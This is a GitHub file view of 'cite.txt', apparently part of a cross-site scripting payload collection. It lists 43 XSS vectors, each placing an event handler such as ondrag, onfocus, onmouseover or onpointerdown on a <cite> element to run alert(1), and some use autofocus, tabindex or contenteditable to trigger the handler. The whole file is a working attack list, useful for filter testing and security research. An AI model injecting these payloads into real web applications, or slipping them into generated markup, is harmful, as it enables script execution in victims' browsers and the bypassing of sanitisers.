-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathcite.txt
43 lines (43 loc) · 2.13 KB
/
cite.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
<cite draggable="true" ondrag="alert(1)">test</cite>
<cite draggable="true" ondragend="alert(1)">test</cite>
<cite draggable="true" ondragenter="alert(1)">test</cite>
<cite draggable="true" ondragleave="alert(1)">test</cite>
<cite draggable="true" ondragstart="alert(1)">test</cite>
<cite id=x tabindex=1 onactivate=alert(1)></cite>
<cite id=x tabindex=1 onbeforeactivate=alert(1)></cite>
<cite id=x tabindex=1 onbeforedeactivate=alert(1)></cite><input autofocus>
<cite id=x tabindex=1 ondeactivate=alert(1)></cite><input id=y autofocus>
<cite id=x tabindex=1 onfocus=alert(1)></cite>
<cite id=x tabindex=1 onfocusin=alert(1)></cite>
<cite onafterscriptexecute=alert(1)><script>1</script>
<cite onbeforecopy="alert(1)" contenteditable>test</cite>
<cite onbeforecut="alert(1)" contenteditable>test</cite>
<cite onbeforepaste="alert(1)" contenteditable>test</cite>
<cite onbeforescriptexecute=alert(1)><script>1</script>
<cite onblur=alert(1) tabindex=1 id=x></cite><input autofocus>
<cite onclick="alert(1)">test</cite>
<cite oncontextmenu="alert(1)">test</cite>
<cite oncopy=alert(1) value="XSS" autofocus tabindex=1>test
<cite oncut=alert(1) value="XSS" autofocus tabindex=1>test
<cite ondblclick="alert(1)" autofocus tabindex=1>test</cite>
<cite onfocusout=alert(1) tabindex=1 id=x></cite><input autofocus>
<cite onkeydown="alert(1)" contenteditable>test</cite>
<cite onkeypress="alert(1)" contenteditable>test</cite>
<cite onkeyup="alert(1)" contenteditable>test</cite>
<cite onmousedown="alert(1)">test</cite>
<cite onmouseenter="alert(1)">test</cite>
<cite onmouseleave="alert(1)">test</cite>
<cite onmousemove="alert(1)">test</cite>
<cite onmouseout="alert(1)">test</cite>
<cite onmouseover="alert(1)">test</cite>
<cite onmouseup="alert(1)">test</cite>
<cite onmousewheel=alert(1)>requires scrolling
<cite onpaste="alert(1)" contenteditable>test</cite>
<cite onpointerdown=alert(1)>XSS</cite>
<cite onpointerenter=alert(1)>XSS</cite>
<cite onpointerleave=alert(1)>XSS</cite>
<cite onpointermove=alert(1)>XSS</cite>
<cite onpointerout=alert(1)>XSS</cite>
<cite onpointerover=alert(1)>XSS</cite>
<cite onpointerrawupdate=alert(1)>XSS</cite>
<cite onpointerup=alert(1)>XSS</cite>